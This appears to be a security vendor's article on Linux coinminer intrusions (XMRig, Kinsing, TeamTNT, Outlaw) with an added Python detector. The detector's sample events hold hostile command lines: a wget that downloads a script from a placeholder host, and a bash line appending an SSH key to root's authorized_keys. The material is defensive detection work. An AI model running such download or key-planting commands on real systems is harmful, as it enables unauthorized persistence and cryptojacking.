Editors’ note: While the analysis and detection opportunities remain applicable, this page has not been updated since 2022.
While coinminers affect all operating systems, they made up the majority of the threats we saw on Linux environments in 2021, just as we’ve seen in years prior. As Log4j vulnerabilities consumed the information security news cycle in December 2021, researchers reported adversaries exploiting Log4j to deliver XMRig payloads and other coinminers. Being able to detect and respond to common threats like coinminers will help any blue team detect a wide range of activity—even when it emanates from unknown exploits.
Many of our Linux coinminer detections began with a Secure Shell (SSH) daemon or a web server process. While we often did not know the exact method of initial access, the intrusion chains we observed suggested that many of them began with weak user authentication or exploitation of web applications. After gaining initial access, adversaries usually leveraged system utilities such as wget to download additional utilities like shell scripts and coinmining binaries from external sources.
The shell scripts we identified performed various actions, including host reconnaissance, inhibition of competing miners, defense evasion, and persistence. Two common persistence methods we’ve observed with miner threats like Kinsing and TeamTNT are adding SSH keys to a user’s authorized_keys file and creating scheduled tasks via the crontab command, two relatively easy techniques. A single shell command can be added to a script and establish hooks without much effort on the part of the adversary.
The coinmining binaries that we observed most commonly were XMRig payloads, which were often delivered by adversaries who targeted unpatched endpoints. We observed threats such as Outlaw authenticating via SSH to endpoints, presumably as a result of brute-force attempts, followed by executing shell scripts that initiated XMRig payloads named kswapd0. We also saw z0miner exploiting vulnerabilities in Confluence to deploy XMRig payloads by executing various shell scripts.
Finally, Bird Miner tried to execute XMRig payloads on macOS hosts by using Qemu to emulate a Linux environment. No matter how elaborate their initial access techniques, the commonality between these threats is XMRig payloads. Due to its popularity, XMRig artifacts provide excellent opportunities for detection, including several discussed below.
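As an added example (not code from the original report), the Python below turns the behaviours described above into four detection rules and runs them over constructed process-start records: a download utility beneath sshd or a web server process, a shell appending to authorized_keys, crontab driven by a script rather than an interactive edit, and a process named kswapd0 backed by a binary in a writable directory. The service names, directory list, record format and sample events are assumptions, not telemetry from the report.

```python
"""Toy detector for the Linux coinminer chain described above.
Runs over constructed process-start records, not real telemetry."""
import re

DOWNLOADERS = {"wget", "curl"}
EXPOSED_SERVICES = {"sshd", "httpd", "apache2", "nginx", "java", "php-fpm"}  # assumed list
SHELLS = {"sh", "bash", "dash"}
AUTH_KEYS = re.compile(r"\.ssh/authorized_keys")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")  # assumed list


def detect(events):
    """Return (rule, pid) tuples for records matching the behaviours the text lists."""
    hits = []
    for ev in events:
        name, cmd, exe = ev["name"], ev["cmdline"], ev.get("exe", "")
        ancestors = set(ev["ancestors"])
        # Download utility spawned somewhere beneath SSH or a web server process.
        if name in DOWNLOADERS and ancestors & EXPOSED_SERVICES:
            hits.append(("download_under_exposed_service", ev["pid"]))
        # Shell appending an SSH key to authorized_keys for persistence.
        if name in SHELLS and AUTH_KEYS.search(cmd) and ">>" in cmd:
            hits.append(("authorized_keys_append", ev["pid"]))
        # crontab invoked by a script (non-interactive) rather than 'crontab -e' by hand.
        if name == "crontab" and ev["parent"] in SHELLS and "-e" not in cmd.split():
            hits.append(("scripted_crontab", ev["pid"]))
        # The real kswapd0 is a kernel thread with no on-disk executable; a copy
        # running from a user-writable directory is a masquerading binary.
        if name == "kswapd0" and exe.startswith(WRITABLE_DIRS):
            hits.append(("kswapd0_masquerade", ev["pid"]))
    return hits


# Constructed sample records (not real telemetry); the URL and paths are placeholders.
SAMPLE_EVENTS = [
    {"pid": 2, "name": "kswapd0", "parent": "kthreadd", "ancestors": ["kthreadd"],
     "cmdline": "", "exe": ""},                                    # genuine kernel thread
    {"pid": 101, "name": "wget", "parent": "bash", "ancestors": ["bash", "sshd"],
     "cmdline": "wget http://example.invalid/x.sh -O /tmp/x.sh", "exe": "/usr/bin/wget"},
    {"pid": 102, "name": "bash", "parent": "bash", "ancestors": ["bash", "sshd"],
     "cmdline": "bash -c 'echo ssh-rsa AAAA... >> /root/.ssh/authorized_keys'",
     "exe": "/usr/bin/bash"},
    {"pid": 103, "name": "crontab", "parent": "sh", "ancestors": ["sh", "bash", "sshd"],
     "cmdline": "crontab /tmp/.cron", "exe": "/usr/bin/crontab"},
    {"pid": 104, "name": "kswapd0", "parent": "bash", "ancestors": ["bash", "sshd"],
     "cmdline": "./kswapd0", "exe": "/tmp/.hidden/kswapd0"},
    {"pid": 105, "name": "crontab", "parent": "bash", "ancestors": ["bash", "sshd"],
     "cmdline": "crontab -e", "exe": "/usr/bin/crontab"},          # admin editing by hand
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The first rule will also fire on an administrator fetching packages over an SSH session, so in practice it is best scored alongside the other three rather than alerted on alone.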